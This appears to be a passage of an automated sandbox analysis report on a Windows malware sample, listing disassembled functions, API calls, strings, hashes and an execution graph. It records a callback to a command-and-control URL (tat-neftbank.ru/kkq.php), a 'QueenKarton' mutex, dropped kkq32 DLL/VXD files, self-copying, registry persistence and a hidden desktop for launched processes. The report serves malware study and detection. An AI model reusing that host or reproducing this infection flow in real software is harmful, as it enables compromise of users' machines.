                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 4053ac CloseHandle sprintf 2721->2722 2732 405469 2721->2732 2724 405413 2722->2724 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2729 405421 Sleep 2727->2729 2727->2732 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2732 2732->2723 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 4078fe CallWindowProcA 2748->2753 2755 407910 2748->2755 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2754 407885 SetFocus 2752->2754 2753->2755 2754->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2863 405e1b Sleep GetWindowTextA 2861->2863 2862->2861 2864 405df8 Sleep 2862->2864 2865 405e50 2863->2865 2864->2860 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 2915->2916 2917 405a20 sprintf rand 2916->2917 2918 405a0c strcat 2916->2918 2919 405a70 strcat rand 2917->2919 2920 405a5c strcat 2917->2920 2918->2917 2921 405ab0 rand sprintf rand 2919->2921 2922 405a9c strcat 2919->2922 2920->2919 2923 405af3 strcat 2921->2923 2924 405b07 strcat rand 2921->2924 2922->2921 2923->2924 2925 405b39 strcat 2924->2925 2926 405b4d rand 2924->2926 2925->2926 2927 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2926->2927 2928 405b5f rand sprintf 2926->2928 2929 405c04 2927->2929 2928->2927 2929->2849 2929->2853 2931 4079e4 2930->2931 2932 405620 FindFirstUrlCacheEntryA 2931->2932 2933 405663 _stricmp 2932->2933 2936 405685 2932->2936 2934 4056a7 FindNextUrlCacheEntryA 2933->2934 2933->2936 2935 4056c9 _stricmp 2934->2935 2934->2936 2935->2936 2937 4056fb 2935->2937 2936->2867 2937->2934 2939 403775 2938->2939 2940 403779 SetFilePointer WriteFile CloseHandle 2938->2940 2939->2875 2940->2939 2947 40421f RegCreateKeyExA 2941->2947 2945 40421f 4 API calls 2944->2945 2946 4041ee InterlockedIncrement memset 2945->2946 2946->2886 2948 404262 RegSetValueExA 2947->2948 2949 404219 2947->2949 2950 404288 RegCloseKey 2948->2950 2951 40427c RegCloseKey 2948->2951 2949->2878 2950->2949 2951->2949 2953 401634 2952->2953 2954 401638 strcat sprintf rand 2953->2954 2955 40160e rand 2953->2955 2954->2897 2954->2898 2955->2953 3005 4037aa 3007 4037c8 printf printf 3005->3007 3008 40380d 3007->3008 3009 4037fa printf 3008->3009 3011 403812 printf 3008->3011 3009->3008 3012 4035ab 3013 4079e4 3012->3013 3014 4035b8 vsprintf 3013->3014 3017 4035f9 MessageBoxA 3014->3017 3016 4035ea 3017->3016 2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760 2956 40328f 2957 402efd 2956->2957 2958 402cd7 3 API calls 2957->2958 2959 4033ce 2957->2959 2960 4030e5 GetModuleHandleA 2957->2960 2961 40289a 4 API calls 2957->2961 2962 40314c VirtualQuery 2957->2962 2964 402f98 GlobalMemoryStatus 2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3087 4049a3 3083->3087 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3088 404cac strcat 3086->3088 3089 404cbf rand 3086->3089 3087->3084 3090 404a4b sprintf rand 3087->3090 3091 4049d9 sprintf 3087->3091 3088->3089 3092 404cd1 strcat 3089->3092 3093 404ce4 rand 3089->3093 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3087 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3087 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3087 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2774 407198 PostQuitMessage 2768->2774 2775 4077cc DefWindowProcA 2769->2775 2772 4072c9 GetWindowTextA 2770->2772 2773 4072a9 MessageBoxA SetFocus 2770->2773 2776 407041 2771->2776 2777 40705c 2771->2777 2778 407322 2772->2778 2779 407302 MessageBoxA SetFocus 2772->2779 2773->2764 2774->2764 2775->2764 2776->2769 2776->2775 2781 4071cb 2776->2781 2780 407149 2777->2780 2817 405ffa 2777->2817 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2800 407112 MoveWindow 2793->2800 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2798 407477 sprintf GetWindowTextA 2796->2798 2799 407457 MessageBoxA SetFocus 2796->2799 2797->2764 2801 4074d9 2798->2801 2802 4074b9 MessageBoxA SetFocus 2798->2802 2799->2764 2800->2780 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075c6 2804->2807 2808 4075a6 MessageBoxA SetFocus 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2809 407627 sprintf CreateFileA SetFilePointer 2807->2809 2810 4075e5 MessageBoxA SetFocus 2807->2810 2808->2764 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2822 406020 2819->2822 2820 406028 GetClassNameA 2820->2822 2821 406024 2821->2786 2822->2820 2822->2821 2823 40605f GetWindow 2822->2823 2823->2822 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2538 4079a6 2533->2538 2535 4079cf GetModuleHandleA 2534->2535 2534->2538 2539 406c29 OpenMutexA 2535->2539 2538->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2550 406d8a sprintf CopyFileA 2548->2550 2551 406d7c 2548->2551 2549->2546 2563 403ce9 rand 2550->2563 2551->2550 2552 406f65 2602 4023a7 CreateThread CloseHandle 2552->2602 2553 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 2557->2654 2672 40682b 2557->2672 2560 406fc4 TranslateMessage DispatchMessageA 2559->2560 2561 401284 exit 2559->2561 2560->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2552 2592->2553 2593 4030e5 GetModuleHandleA 2593->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2600 403059 CloseHandle 2600->2601 2601->2592 2601->2593 2601->2595 2601->2597 2601->2598 2601->2600 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 2704->2706 2705->2706 2706->2696

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
